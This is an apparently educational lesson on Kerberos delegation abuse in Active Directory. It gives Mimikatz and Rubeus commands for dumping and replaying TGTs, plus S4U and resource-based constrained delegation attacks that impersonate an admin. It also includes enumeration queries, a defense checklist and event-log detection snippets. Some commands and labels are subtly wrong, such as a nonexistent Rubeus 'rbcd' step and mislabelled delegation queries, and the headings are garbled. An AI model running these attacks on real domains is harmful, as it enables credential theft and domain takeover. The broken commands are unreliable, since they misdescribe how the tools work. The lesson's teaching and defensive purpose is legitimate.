๐ Lesson 4: Delegation Abuse & Advanced Attacks
Advanced Kerberos delegation exploitation and comprehensive defense strategies
๐ Learning Objectives
By the end of this lesson, you will be able to:
- Understand Kerberos delegation types and security implications
- Master unconstrained delegation exploitation techniques
- Execute constrained delegation and resource-based constrained delegation attacks
- Implement S4U2Self and S4U2Proxy attack methodologies
- Analyze delegation vulnerabilities and attack paths
- Deploy comprehensive delegation security controls
๐ Kerberos Delegation Fundamentals
What is Kerberos Delegation?
Kerberos Delegation allows a service to act on behalf of a user when accessing other services. This is essential for multi-tier applications where a web service needs to access a database on behalf of the user.
๐ Delegation Key Concepts:
- Impersonation: Service acts as the user
- Forwardable Tickets: Tickets that can be delegated
- Service-to-Service Authentication: Services authenticate to other services
- User Context Preservation: Maintains user identity through service chain
Delegation Types
๐ Unconstrained Delegation
Service can delegate to any service in the domain
Characteristics:
- Complete delegation freedom
- Can access any service
- High security risk
- Legacy configuration
Security Impact:
- Complete domain compromise potential
- Lateral movement opportunities
- Privilege escalation vectors
๐ Constrained Delegation
Service can only delegate to specific services
Characteristics:
- Limited delegation scope
- Specific service targets
- Protocol transition support
- More secure than unconstrained
Security Impact:
- Limited attack surface
- Targeted service access
- S4U attack vectors
๐ก๏ธ Resource-Based Constrained Delegation
Target service controls which services can delegate to it
Characteristics:
- Resource-controlled delegation
- Enhanced security model
- PrincipalsAllowedToDelegateToSelf
- Modern configuration approach
Security Impact:
- Reduced attack surface
- Target service control
- Limited exploitation opportunities
๐ Unconstrained Delegation Abuse
Unconstrained Delegation Attack Process
1
๐ฏ Target Identification
Identify services with unconstrained delegation
Enumeration Methods:
- PowerShell Active Directory queries
- BloodHound analysis
- LDAP attribute examination
- Automated enumeration tools
2
๐ซ Ticket Collection
Collect TGTs from users accessing the service
Collection Methods:
- Monitor memory for cached tickets
- Use Mimikatz to extract tickets
- Wait for high-privilege users
- Social engineering techniques
3
๐ Ticket Usage
Use collected TGTs for domain access
Usage Capabilities:
- Access any service in domain
- Impersonate the user
- Perform lateral movement
- Escalate privileges
Unconstrained Delegation Implementation
๐ง Using Mimikatz
Traditional unconstrained delegation exploitation
Command Syntax:
# Check for unconstrained delegation
privilege::debug
sekurlsa::tickets /export
# Extract TGTs from memory
sekurlsa::tickets /export /luid:0x123456
# Use extracted TGT
kerberos::ptt ticket.kirbi
# Access domain resources
ls \\dc01.domain.com\c$
โก Using Rubeus
Modern C# implementation
Command Syntax:
# Monitor for TGTs
Rubeus.exe monitor /interval:5
# Extract TGTs
Rubeus.exe dump /luid:0x123456
# Use TGT for access
Rubeus.exe ptt /ticket:tgt.kirbi
# Access domain resources
Rubeus.exe klist
๐ Constrained Delegation Abuse
S4U Attack Techniques
Service for User (S4U) extensions allow services to obtain tickets on behalf of users. This includes S4U2Self (impersonate user to self) and S4U2Proxy (impersonate user to another service).
๐ญ S4U2Self Attack
Service impersonates user to itself
Attack Process:
- Compromise service with constrained delegation
- Use S4U2Self to impersonate user
- Obtain forwardable ticket
- Use ticket for service access
Implementation:
# S4U2Self attack
Rubeus.exe s4u /user:service_account /rc4:service_hash /impersonateuser:target_user /msdsspn:cifs/target_server.domain.com
# Use the ticket
Rubeus.exe ptt /ticket:ticket.kirbi
๐ S4U2Proxy Attack
Service impersonates user to another service
Attack Process:
- Compromise service with constrained delegation
- Use S4U2Self to get forwardable ticket
- Use S4U2Proxy to access target service
- Impersonate user on target service
Implementation:
# S4U2Proxy attack
Rubeus.exe s4u /user:service_account /rc4:service_hash /impersonateuser:target_user /msdsspn:cifs/target_server.domain.com /altservice:ldap
# Access target service
Rubeus.exe ptt /ticket:proxy_ticket.kirbi
Constrained Delegation Enumeration
๐ PowerShell Enumeration
Native PowerShell queries for constrained delegation
Command Syntax:
# Find services with constrained delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation, TrustedToAuthForDelegation, ServicePrincipalName
# Find users with constrained delegation
Get-ADUser -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation, TrustedToAuthForDelegation, ServicePrincipalName
# Check specific delegation settings
Get-ADComputer -Identity "server01" -Properties TrustedForDelegation, TrustedToAuthForDelegation, msDS-AllowedToDelegateTo
๐ง BloodHound Analysis
Graph-based analysis of delegation relationships
BloodHound Queries:
# Find unconstrained delegation
MATCH (c:Computer) WHERE c.unconstraineddelegation = true RETURN c
# Find constrained delegation
MATCH (c:Computer) WHERE c.constraineddelegation = true RETURN c
# Find delegation paths
MATCH (c1:Computer)-[r:AllowedToDelegate]->(c2:Computer) RETURN c1, r, c2
๐ก๏ธ Resource-Based Constrained Delegation Abuse
RBCD Attack Methodology
Resource-Based Constrained Delegation (RBCD) allows the target service to control which services can delegate to it. This can be abused by adding a compromised service account to the PrincipalsAllowedToDelegateToSelf attribute.
1
๐ฏ Target Identification
Identify services that can be targeted for RBCD abuse
Target Criteria:
- Services with SPNs
- Services with write permissions
- Services with GenericWrite/GenericAll
- Services with msDS-AllowedToActOnBehalfOfOtherIdentity
2
๐ง Service Account Creation
Create or compromise a service account for delegation
Account Requirements:
- Service account with SPN
- Password known to attacker
- Account with delegation capabilities
- Sufficient permissions for RBCD
3
๐ RBCD Configuration
Configure RBCD on target service
Configuration Process:
- Set PrincipalsAllowedToDelegateToSelf
- Add service account to delegation list
- Configure delegation permissions
- Verify RBCD configuration
4
๐ Delegation Abuse
Use RBCD for service impersonation
Abuse Capabilities:
- Impersonate any user
- Access target service
- Perform lateral movement
- Escalate privileges
RBCD Implementation
๐ง Using Rubeus
Modern RBCD attack implementation
Command Syntax:
# Configure RBCD
Rubeus.exe rbcd /user:target_service /rc4:target_hash /delegatefrom:compromised_service
# Perform S4U attack
Rubeus.exe s4u /user:compromised_service /rc4:compromised_hash /impersonateuser:admin /msdsspn:cifs/target_service.domain.com
# Use the ticket
Rubeus.exe ptt /ticket:ticket.kirbi
โก Using PowerShell
Native PowerShell RBCD implementation
Command Syntax:
# Configure RBCD
$target = Get-ADComputer -Identity "target_service"
$delegate = Get-ADComputer -Identity "compromised_service"
$target | Set-ADComputer -PrincipalsAllowedToDelegateToSelf $delegate
# Verify RBCD configuration
Get-ADComputer -Identity "target_service" -Properties PrincipalsAllowedToDelegateToSelf
๐ก๏ธ Comprehensive Defense Strategies
Delegation Security Controls
๐ Delegation Hardening
Implementation:
- Eliminate unconstrained delegation
- Use constrained delegation only when necessary
- Implement resource-based constrained delegation
- Regular delegation audits
- Principle of least privilege
๐ Monitoring & Detection
Implementation:
- Monitor delegation configuration changes
- Alert on S4U attacks
- Track unusual delegation usage
- Implement behavioral analysis
- Use SIEM integration
๐ง Configuration Management
Implementation:
- Document all delegation configurations
- Implement change management
- Regular security assessments
- Automated configuration validation
- Security baseline enforcement
๐จ Incident Response
Implementation:
- Develop delegation incident procedures
- Implement automated response
- Regular security training
- Forensic analysis capabilities
- Threat hunting programs
๐งช Hands-On Exercise
Exercise: Comprehensive Delegation Attack Simulation
Objective: Execute various delegation attacks in a controlled environment and implement comprehensive defense mechanisms.
๐ Steps:
-
Delegation Enumeration
Identify delegation configurations:
# Find unconstrained delegation Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation # Find constrained delegation Get-ADComputer -Filter {TrustedToAuthForDelegation -eq $true} -Properties TrustedToAuthForDelegation # Find RBCD configurations Get-ADComputer -Filter * -Properties PrincipalsAllowedToDelegateToSelf | Where-Object {$_.PrincipalsAllowedToDelegateToSelf} -
Unconstrained Delegation Attack
Execute unconstrained delegation abuse:
# Monitor for TGTs Rubeus.exe monitor /interval:5 # Extract TGTs when available Rubeus.exe dump /luid:0x123456 # Use TGT for domain access Rubeus.exe ptt /ticket:tgt.kirbi -
Constrained Delegation Attack
Execute S4U attacks:
# S4U2Self attack Rubeus.exe s4u /user:service_account /rc4:service_hash /impersonateuser:admin /msdsspn:cifs/target_server.domain.com # Use the ticket Rubeus.exe ptt /ticket:ticket.kirbi -
RBCD Attack
Execute resource-based constrained delegation abuse:
# Configure RBCD Rubeus.exe rbcd /user:target_service /rc4:target_hash /delegatefrom:compromised_service # Perform S4U attack Rubeus.exe s4u /user:compromised_service /rc4:compromised_hash /impersonateuser:admin /msdsspn:cifs/target_service.domain.com -
Detection Implementation
Implement detection mechanisms:
# Monitor delegation events Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4768} | Where-Object {$_.Message -like "*S4U*"} # Check for delegation changes Get-WinEvent -FilterHashtable @{LogName='Security'; ID=5136} | Where-Object {$_.Message -like "*delegation*"}
๐ Deliverables:
- Delegation enumeration report
- Unconstrained delegation attack demonstration
- Constrained delegation attack demonstration
- RBCD attack demonstration
- Detection mechanism implementation
- Security recommendations report